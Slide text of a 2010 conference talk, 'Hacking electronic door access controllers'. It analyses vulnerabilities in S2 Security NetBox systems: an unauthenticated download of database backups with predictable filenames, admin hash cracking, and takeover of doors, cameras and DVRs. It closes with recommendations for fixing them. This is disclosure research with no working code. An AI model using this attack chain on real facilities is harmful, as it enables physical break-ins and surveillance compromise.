SlideShare a Scribd company logo
“We don’t need no stinkin’ badges!”Hacking electronic door access controllersShawn Merdingersecurity researcher / corporate agitatorCarolinaCon 2010
The obligatory speaker slide
OutlineEDAC technologyTrends, landscapeVendorsArchitectureEDAC real-world analysis S2 Security NetBoxResearch, exposure, vulnerabilities, attacksCountermeasures & recommendations
Learning outcomesAwareness of security issues in EDAC systemsMajor players, vendors, resellersPen-testing knowledgeResearch and testing methods
Choice quotations“When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare.”John L. Moss, S2 Security CEO					STAD, Volume14, Issue 1.  1 January, 2004Q .  About security of buildings around town….what was your response? ATTY GEN. RENO:   “Let's do something about it.”Q.   Is this a good thing that has happened? ATTY GEN. RENO:   I think any time you expose vulnerabilities, it's a good thing.    	      Department of Justice					      Weekly Media Briefing, 25 May 2000
EDAC Technology OverviewTrend is towards IP from proprietary solutionConvergence of IP, VideoAdding other building systems (HVAC, elevators, alarms)Cost savings, integration, increased capabilities Most controllers use embedded LinuxWide range of vendors in EDAC spaceS2 SecurityHoneywellHID Global VertxIngersoll-RandBosch SecurityReach SystemsCisco Systems (Richards Zeta)BrivoDSX AccessRS2 TechnologiesSynergistics
EDAC DeploymentOften you’ll seeManaged by building facilities peopleStuck in a closet and forgottenLong lifecycles of 5-10 yearsDistanced from IT SecurityPhysical security is not your domain.  It’s ours.Patching, upgrades, maintenance.  What?  Huh?Policies regarding passwords, logging don’t apply3rd party local service contractor adds doors, hardware configuration
EDAC Architecture
S2 Security NetBoxBuilt by S2 Security7000+ systems installed worldwideSchools, hospitals, businesses, LEA facilities, etc.Same box is sold under multiple brand namesBuilt by S2 SecurityNetBoxDistributed by LineareMerge 50 & 5000Resellers’ re-brandingSonitroleAccess
S2 Security NetBox
S2 NetBox
S2 Security: Reading upPreparation and information gatheringS2 Security case studies, press releases“The Google”Lexis-Nexis Academic Universe, ABI-Inform, etc.Example: able to determine from http://tinyurl.com/s2mysqlSamba clientMySQL, MyISAMLineo Linux distribution  (just like Zarus! )Processor is ARM Core IXP 425 chip @ 533 MHzOnly 15 months from design to 1st customer shipping“S2 did not have much prior experience with open source”“MySQLis used to store everything from reports, user information, customized features, facility diagrams, and more”
S2 Security Marketing
NetBox ComponentsHTTPMySQL / PostgresNmCommFTP/TelnetFeatures!
NetBox Component: HTTP ServerGoAheadWebserverTCP/80Poor choice Sixteen CVEs CVE-2003-1568, CVE-2002-2431, CVE-2002-2430, CVE-2002-2429, CVE-2002-2428, etc.No vendor responseTypical example in CVE-2002-1951Vendor response:GoAhead….contacted on three different occasions during the last three months but supplied no meaningful response."Data security is a challenge, and unfortunately, not everyone has risen to it.“    						      John L. Moss, S2 Security CEO
NetBox Component:  MySQLMySQL server listening on 3306Outdated SQLVersion 2.X uses MySQL version 4.03.X uses PostgresJust how old is MySQL 4.0?  WTF?  End of DOWNLOAD?
NetBox Component: NmCommService listening on TCP/7362Performs multicast discovery of nodesDaemon coded by S2 SecurityPatent issued 15 December, 2009“System and method to configure a network node”http://tinyurl.com/s2patent	   “Gentlemen, start your fuzzers!”
NetBoxComponent: FTP & telnetCleartext protocols for a security deviceTelnet to manageFTP for DB backupsPoor security-oriented documentation"We see some vendors fitting their serial devices with Telnet adapters, which simply sit on the network transmitting unsecured serial data.”John L. Moss, S2 Security CEO
NetBoxComponents: Features!Lots of extras and licenses optionsElevators, HVAC, BurglarVoIPIncreases complexityExpands attack surfaceDaemonsLibraries
NetBoxComponents: Features!View floorplans
NetBox unauthenticated resetVU#571629 (public 2010-01-04)
NetBoxUnauth Access to BackupVU#228737 (not public)Unauth attacker can dload DB backupsNightly DB backup is hardcoded CRONJOBFile name is “full_YYYYMMDD_HHMMSS.1.dar”Predictable naming convention with timestampUncompress the.dar formatBackup DB is in “var/db/s2/tmp/backup/all.dmp”Attacker gets backup DB = Game OverEntire system data in DB!
NetBoxUnauth Access to BackupExtraction of administrator MySQL_64bit hashAffects NetBox 2.X (mysql) and 3.X (postgres)Hash is trivial to crackAttacker now has admin access
NetBoxPwnage: DoorsOpen any doorRight nowOr schedule
NetBoxPwnage: CamerasBackup file contains IP camera informationName, IP address, admin username and passwordNetBox 2.X and 3.X systems vulnerableAttacker now owns IP cameras"Most hackers don't care about watching your lobby.  If they gain access to the network, they're going to go after financial data and trade secrets.” 					        Justin Lott, Bosch security marketing
NetBoxPwnage: DVRsUser/Pass to DVRs in backup DBPoor setup guides for DVRsRecommends keeping default user/passOn-Net Surveillance Systems Network Video Recorder document
NetBox FingerprintingRemote IdentificationMAC OID registered to S2 Security Nmapservice fingerprint submitted (nmap 5.20)
NetBox “ShodanEffect”The Shodaneffect
ShodanEffect: Other EDACsiGuard biometric fingerprint reader
i am scared…
Recommendations: VendorVendorConduct security evaluations on your productsProvide secure deployment guidesTighten-up 3rd party integration ImproveLoggingMore details: changes, auditing, debug levelsAbility to send to log serverHTTPUse a “better” HTTP daemonEnable HTTPS by defaultModify banners, reduce footprint, etc.FTPChange to SFTPTelnetChange to SSH
Recommendations: CustomersDemand better security!  From vendor, reseller, and service contractorExpect fixes and patchesManage your EDAC like any other IT systemPatching, change management, security reviewsTechnicalIsolate eMerge system componentsVLANs, MAC auth, VPN, restrict IP, etc.

More Related Content

More from shawn_merdinger (6)

Shodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San FranciscoShodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San Francisco
shawn_merdinger
 
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
shawn_merdinger
 
Medical Device Security: State of the Art -- NoConName, Barcelona, 2011
Medical Device Security:  State of the Art -- NoConName, Barcelona, 2011 Medical Device Security:  State of the Art -- NoConName, Barcelona, 2011
Medical Device Security: State of the Art -- NoConName, Barcelona, 2011
shawn_merdinger
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18  "Hacking Electronic Door Access Controllers" Defcon 18  "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers"
shawn_merdinger
 
Csi Netsec 2006 Poor Mans Guide Merdinger
Csi Netsec 2006 Poor Mans Guide MerdingerCsi Netsec 2006 Poor Mans Guide Merdinger
Csi Netsec 2006 Poor Mans Guide Merdinger
shawn_merdinger
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gear
shawn_merdinger
 
Shodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San FranciscoShodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San Francisco
shawn_merdinger
 
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
Weaponizing the Nokia N900 -- TakeDownCon, Dallas, 2011
shawn_merdinger
 
Medical Device Security: State of the Art -- NoConName, Barcelona, 2011
Medical Device Security:  State of the Art -- NoConName, Barcelona, 2011 Medical Device Security:  State of the Art -- NoConName, Barcelona, 2011
Medical Device Security: State of the Art -- NoConName, Barcelona, 2011
shawn_merdinger
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18  "Hacking Electronic Door Access Controllers" Defcon 18  "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers"
shawn_merdinger
 
Csi Netsec 2006 Poor Mans Guide Merdinger
Csi Netsec 2006 Poor Mans Guide MerdingerCsi Netsec 2006 Poor Mans Guide Merdinger
Csi Netsec 2006 Poor Mans Guide Merdinger
shawn_merdinger
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gear
shawn_merdinger
 

We Don\'t Need no Stinkin Badges: hacking Electronic Door Access Controllers" -- Shawn Merdinger @ Carolinacon

  • 1. “We don’t need no stinkin’ badges!”Hacking electronic door access controllersShawn Merdingersecurity researcher / corporate agitatorCarolinaCon 2010
  • 3. OutlineEDAC technologyTrends, landscapeVendorsArchitectureEDAC real-world analysis S2 Security NetBoxResearch, exposure, vulnerabilities, attacksCountermeasures & recommendations
  • 4. Learning outcomesAwareness of security issues in EDAC systemsMajor players, vendors, resellersPen-testing knowledgeResearch and testing methods
  • 5. Choice quotations“When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare.”John L. Moss, S2 Security CEO STAD, Volume14, Issue 1. 1 January, 2004Q . About security of buildings around town….what was your response? ATTY GEN. RENO: “Let's do something about it.”Q. Is this a good thing that has happened? ATTY GEN. RENO: I think any time you expose vulnerabilities, it's a good thing. Department of Justice Weekly Media Briefing, 25 May 2000
  • 6. EDAC Technology OverviewTrend is towards IP from proprietary solutionConvergence of IP, VideoAdding other building systems (HVAC, elevators, alarms)Cost savings, integration, increased capabilities Most controllers use embedded LinuxWide range of vendors in EDAC spaceS2 SecurityHoneywellHID Global VertxIngersoll-RandBosch SecurityReach SystemsCisco Systems (Richards Zeta)BrivoDSX AccessRS2 TechnologiesSynergistics
  • 7. EDAC DeploymentOften you’ll seeManaged by building facilities peopleStuck in a closet and forgottenLong lifecycles of 5-10 yearsDistanced from IT SecurityPhysical security is not your domain. It’s ours.Patching, upgrades, maintenance. What? Huh?Policies regarding passwords, logging don’t apply3rd party local service contractor adds doors, hardware configuration
  • 9. S2 Security NetBoxBuilt by S2 Security7000+ systems installed worldwideSchools, hospitals, businesses, LEA facilities, etc.Same box is sold under multiple brand namesBuilt by S2 SecurityNetBoxDistributed by LineareMerge 50 & 5000Resellers’ re-brandingSonitroleAccess
  • 12. S2 Security: Reading upPreparation and information gatheringS2 Security case studies, press releases“The Google”Lexis-Nexis Academic Universe, ABI-Inform, etc.Example: able to determine from http://tinyurl.com/s2mysqlSamba clientMySQL, MyISAMLineo Linux distribution (just like Zarus! )Processor is ARM Core IXP 425 chip @ 533 MHzOnly 15 months from design to 1st customer shipping“S2 did not have much prior experience with open source”“MySQLis used to store everything from reports, user information, customized features, facility diagrams, and more”
  • 14. NetBox ComponentsHTTPMySQL / PostgresNmCommFTP/TelnetFeatures!
  • 15. NetBox Component: HTTP ServerGoAheadWebserverTCP/80Poor choice Sixteen CVEs CVE-2003-1568, CVE-2002-2431, CVE-2002-2430, CVE-2002-2429, CVE-2002-2428, etc.No vendor responseTypical example in CVE-2002-1951Vendor response:GoAhead….contacted on three different occasions during the last three months but supplied no meaningful response."Data security is a challenge, and unfortunately, not everyone has risen to it.“ John L. Moss, S2 Security CEO
  • 16. NetBox Component: MySQLMySQL server listening on 3306Outdated SQLVersion 2.X uses MySQL version 4.03.X uses PostgresJust how old is MySQL 4.0? WTF? End of DOWNLOAD?
  • 17. NetBox Component: NmCommService listening on TCP/7362Performs multicast discovery of nodesDaemon coded by S2 SecurityPatent issued 15 December, 2009“System and method to configure a network node”http://tinyurl.com/s2patent “Gentlemen, start your fuzzers!”
  • 18. NetBoxComponent: FTP & telnetCleartext protocols for a security deviceTelnet to manageFTP for DB backupsPoor security-oriented documentation"We see some vendors fitting their serial devices with Telnet adapters, which simply sit on the network transmitting unsecured serial data.”John L. Moss, S2 Security CEO
  • 19. NetBoxComponents: Features!Lots of extras and licenses optionsElevators, HVAC, BurglarVoIPIncreases complexityExpands attack surfaceDaemonsLibraries
  • 22. NetBoxUnauth Access to BackupVU#228737 (not public)Unauth attacker can dload DB backupsNightly DB backup is hardcoded CRONJOBFile name is “full_YYYYMMDD_HHMMSS.1.dar”Predictable naming convention with timestampUncompress the.dar formatBackup DB is in “var/db/s2/tmp/backup/all.dmp”Attacker gets backup DB = Game OverEntire system data in DB!
  • 23. NetBoxUnauth Access to BackupExtraction of administrator MySQL_64bit hashAffects NetBox 2.X (mysql) and 3.X (postgres)Hash is trivial to crackAttacker now has admin access
  • 24. NetBoxPwnage: DoorsOpen any doorRight nowOr schedule
  • 25. NetBoxPwnage: CamerasBackup file contains IP camera informationName, IP address, admin username and passwordNetBox 2.X and 3.X systems vulnerableAttacker now owns IP cameras"Most hackers don't care about watching your lobby. If they gain access to the network, they're going to go after financial data and trade secrets.” Justin Lott, Bosch security marketing
  • 26. NetBoxPwnage: DVRsUser/Pass to DVRs in backup DBPoor setup guides for DVRsRecommends keeping default user/passOn-Net Surveillance Systems Network Video Recorder document
  • 27. NetBox FingerprintingRemote IdentificationMAC OID registered to S2 Security Nmapservice fingerprint submitted (nmap 5.20)
  • 29. ShodanEffect: Other EDACsiGuard biometric fingerprint reader
  • 31. Recommendations: VendorVendorConduct security evaluations on your productsProvide secure deployment guidesTighten-up 3rd party integration ImproveLoggingMore details: changes, auditing, debug levelsAbility to send to log serverHTTPUse a “better” HTTP daemonEnable HTTPS by defaultModify banners, reduce footprint, etc.FTPChange to SFTPTelnetChange to SSH
  • 32. Recommendations: CustomersDemand better security! From vendor, reseller, and service contractorExpect fixes and patchesManage your EDAC like any other IT systemPatching, change management, security reviewsTechnicalIsolate eMerge system componentsVLANs, MAC auth, VPN, restrict IP, etc.